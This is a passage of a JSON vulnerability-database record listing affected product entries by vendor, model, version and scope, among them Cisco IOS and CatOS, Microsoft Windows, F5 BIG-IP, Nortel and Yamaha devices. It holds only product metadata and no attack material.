            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.2(2)"
          },
          {
            "_id": null,
            "model": "windows server itanium sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "ios 12.2sxh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt140p",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.2xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 sm5",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "ios 12.1eu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 sw3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging application server mm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "ios 12.3jeb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "windows vista ultimate",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server for 32-bit systems sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2008"
          },
          {
            "_id": null,
            "model": "networks secure network access switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-40700"
          },
          {
            "_id": null,
            "model": "ios 12.1xt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks callpilot 201i",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 xy4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2mc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0sy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 yd",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 se",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista home premium",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "coat systems director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.2.2.4"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4(2)"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "ios 12.2 sq2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt105",
            "scope": null,
            "trust": 0.3,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 122",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 131",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 109",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(5)"
          },
          {
            "_id": null,
            "model": "netscaler build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.070.5"
          },
          {
            "_id": null,
            "model": "ios 12.0sz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.5(2)"
          },
          {
            "_id": null,
            "model": "ios 12.2 se5",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "point vpn-1 pro/express r65 ipso ga",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "6"
          },
          {
            "_id": null,
            "model": "ios 12.3yu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "10000"
          },
          {
            "_id": null,
            "model": "ios 12.1ya",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.8"
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "ios 12.3xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0sc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(10)"
          },
          {
            "_id": null,
            "model": "point vpn-1 pro/express r65 hfa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "50"
          },
          {
            "_id": null,
            "model": "netscaler",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "8.1.68.7"
          },
          {
            "_id": null,
            "model": "ios 12.4xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 102",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ey",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 02",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3eu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista ultimate 64-bit edition sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2su",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.4.1"
          },
          {
            "_id": null,
            "model": "point software connectra r62 hfa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "01"
          },
          {
            "_id": null,
            "model": "ios 12.4xw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sca",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows datacenter server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.2sef",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ew",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0 sz10",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3.5"
          },
          {
            "_id": null,
            "model": "ios 12.1xz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt105e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 80",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4sw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt140f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.2se",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.1"
          },
          {
            "_id": null,
            "model": "networks contact center administration",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.1eo",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 ya2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 104",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3yk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems proxysg 8100-c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.2yh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks callpilot 202i",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "windows professional sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.3xu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0w",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "rt56v",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 38",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(19)"
          },
          {
            "_id": null,
            "model": "ios 12.2 ixh",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "_id": null,
            "model": "ios 12.2yz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks callpilot 1002rp",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sxe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 129",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(16)"
          },
          {
            "_id": null,
            "model": "ios 12.4 md2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.2.1.6"
          },
          {
            "_id": null,
            "model": "ios 12.2 se2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 jdd",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center ncc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.5(1)"
          },
          {
            "_id": null,
            "model": "ios 12.2xt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center cct",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "ios 12.2scb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rtw65i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 4548gt-pwr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4500"
          },
          {
            "_id": null,
            "model": "ios 12.1xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 mr2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.2(0.65)"
          },
          {
            "_id": null,
            "model": "networks switched firewall sf-5109",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate ssl vpn engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "networks self-service peri ivr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.2zy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "bigip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.1"
          },
          {
            "_id": null,
            "model": "ios 12.2 srb5a",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service wvads",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.2sve",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2irc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(1)"
          },
          {
            "_id": null,
            "model": "windows server web edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "ios 12.3 ym13",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 jx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0 sy8",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yo",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ys",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 84",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.3(2)"
          },
          {
            "_id": null,
            "model": "ios 12.2 sb14",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 sb13",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging application server mm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ios 12.2zj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "ios 12.2mb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "ios 12.2ex",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp media center edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ew",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0wt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0 s3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 xr",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 98",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xnb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rta55i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.1ax",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 da14",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server datacenter edition itanium",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20030"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 117",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging application server mm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ios 12.2yc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 58",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(7)"
          },
          {
            "_id": null,
            "model": "ios 12.2sv",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista home basic sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ye",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "ios 12.2srd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip wan optimization module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.1"
          },
          {
            "_id": null,
            "model": "ios 12.2sva",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service speech server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "nexus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50000"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 22",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center tapi server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "ios 12.0 sy9a",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 81",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.2.10"
          },
          {
            "_id": null,
            "model": "ios 12.2bz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 103",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "ios 12.3xy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sxi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "ios 12.2 sg",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ym",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center multimedia \u0026 outbound",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.5(3)"
          },
          {
            "_id": null,
            "model": "ios 12.0t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "_id": null,
            "model": "rta52i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.4ya",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "ios 12.2xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 4526t",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4500"
          },
          {
            "_id": null,
            "model": "rtx1200",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks secure network access identity engines ignition server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "nx-os",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(4)"
          },
          {
            "_id": null,
            "model": "windows vista enterprise",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ste",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "ios 12.2cz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4jl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista ultimate sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sxd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rtw65b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
